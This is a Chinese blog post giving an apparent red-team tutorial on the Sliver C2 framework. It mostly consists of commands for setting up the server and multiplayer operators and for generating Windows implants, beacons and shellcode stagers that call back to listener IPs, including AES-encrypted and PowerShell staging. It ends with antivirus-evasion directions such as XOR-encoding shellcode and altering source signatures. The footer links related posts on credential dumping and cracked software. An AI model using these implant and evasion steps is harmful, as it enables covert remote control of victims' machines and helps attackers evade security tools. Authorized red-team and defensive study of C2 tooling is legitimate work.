免杀对抗-安全工具篇&新型Go架构&C2-Sliver多平台&上线模式&红队集成研究&免杀方向

Ethan医生4个月前工具119




#安全工具-新型C2-Sliver使用详解

Sliver C2 是一个开源的跨平台红队框架,采用Go开发,目前特征相对于CS更少!

集成了MSF命令行运行模式,又结合了CS的优势特点,合并提供了两种操作模式

Beacon mode:实现了异步通信方式

Session mode:实现了实时会话方式

优势:

免杀能力强化

模块化多扩展

多操组员模式

开源移植性强

支持多平台(Linux, Windows and MacOS)

 

Implant | 植入物

Listener | 监听器

Sessions | 会话

Beacons | 信标

Armory | 扩展管理器

Multiplayer | 多操作员模式

参考:https://forum.butian.net/share/2243

 

#服务端:

sudo apt-get install mingw-w64 binutils-mingw-w64 g++-mingw-w64

给予执行权限:chmod +x sliver-server_linux

直接执行启用:sudo ./sliver-server_linux

生成连接凭据:new-operator --name xiaodisec --lhost 192.168.139.228

启用多人运动:multiplayer

 

#客户端:

导入凭据:

sliver-client_windows.exe import xiaodisec_192.168.139.228.cfg

再次连接:

sliver-client_windows.exe

 

#生成exe

Session mode:

generate --http http://192.168.139.141:90 --os windows

Beacon mode:

generate beacon --http http://192.168.139.141:90 --os windows -S 5

 

#Session mode(Shellcode)

创建profiles

http -l 9002

profiles new --http 192.168.139.141:9002 --skip-symbols --format shellcode --arch amd64 session_test

创建分阶段监听器

stage-listener --url tcp://192.168.139.141:8443 --profile session_test

创建Stager

generate stager --lhost 192.168.139.141 --lport 8443 --arch amd64 --format c

 

#Beacon mode(Shellcode)

http -l 9003

profiles new beacon --http 192.168.139.141:9003 --skip-symbols --format shellcode --arch amd64 beacon_test(-S 5)

stage-listener --url tcp://192.168.139.141:8003 --profile beacon_test

generate stager --lhost 192.168.139.141 --lport 8003 --arch amd64 --format c

 

#配合C# AES

参考:https://sliver.sh/docs?name=Stagers

http -l 9004

 都是使用Ethsec这个名称 壹起绑定

profiles new beacon --http 192.168.233.130:9004 --skip-symbols --format shellcode --arch amd64 Ethsec

stage-listener --url http://192.168.233.130:8004 --profile Ethsec --aes-encrypt-key ethsecdoctor1234(密钥16位)--aes-encrypt-iv heyheyheyheyheyh(偏移量16位)

image.png

  • AES-128 需要:

    • Key(密钥):16 字节(128 位)

    • IV(初始化向量):16 字节(128 位)

  • AES-256 需要:

    • Key(密钥):32 字节(256 位)

    • IV(初始化向量):16 字节(128 位)


#配合PowerShell

参考:https://forum.butian.net/share/2275

profiles new beacon --http 192.168.233.130:9005 --skip-symbols --format shellcode --arch amd64 pstest

http -l 9005

stage-listener --url http://192.168.139.141:8005 --profile pstest

 

#安全工具-新型C2-Sliver免杀方向

1、同CS一样针对ShellCode处理

generate stager --lhost x.x.x.x --lport xx --format raw

file_fl_xor.cpp

2、源码级别的二开魔改打乱特征

-默认生成的模版

-Profile流量模版

-改动工具执行调用链







标签: C2-Sliver

相关文章

免杀对抗-安全工具篇&Go魔改二开&Fscan扫描&FRP代理&特征消除&新增拓展&打乱HASH

➢ 安全工具-Goland-FRP魔改二开-特征消除➢ 安全工具-Goland-FScan魔改二开-特征消除   (主要使用在前期内网信息打点 fscan -h...

nmap与arp-scan功能对比分析

nmap与arp-scan功能对比分析

nmap 和 arp-scan 都是网络扫描工具,但它们在功能、原理和使用场景上有显著区别。以下是主要差异:1. 协议层不同arp-scan:工作在数据链路层(...

免杀对抗-安全工具篇&魔改二开CS&消除流量特征&Profile请求&个性主题&反编译去暗桩

免杀对抗-安全工具篇&魔改二开CS&消除流量特征&Profile请求&个性主题&反编译去暗桩

➢ 安全工具-配置修改-CS流量特征➢ 安全工具-魔改二开-CS个性化打造➢ 安全工具-魔改二开-CS免杀流量对抗#安全工具-配置修改-CS流量特征消除特征点:默认端口,...

免杀对抗-安全工具篇&动态绕过&DumpLsass凭据&Certutil下载&变异替换&打乱源头特征&SysCALL调用

➢ 动态拦截-certutil绕过-源头特征混淆命令➢ 动态拦截-dumplsass绕过-源头特征混淆文件 #动态拦截-certutil绕过-源头特征混淆命令Certut...

Metasploit Framework (MSF) 使用详解

Metasploit Framework (MSF) 是一款开源的渗透测试框架,广泛应用于网络安全领域。以下是MSF的详细使用指南:一、MSF基础1. 安装与启动Kali Linux:预装MSF,可直...

解压缩软件Bandizip v7.37 正式版破解专业版

解压缩软件Bandizip v7.37 正式版破解专业版

Bandizip,免费解压缩软件,号称速度最快的压缩和解压缩文件管理器。支持多核快速压缩、快速拖放,可以创建带密码和多卷的压缩包,可以提取包括RAR/RAR5/7Z/ZIP在内30多种格式,支持Win...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。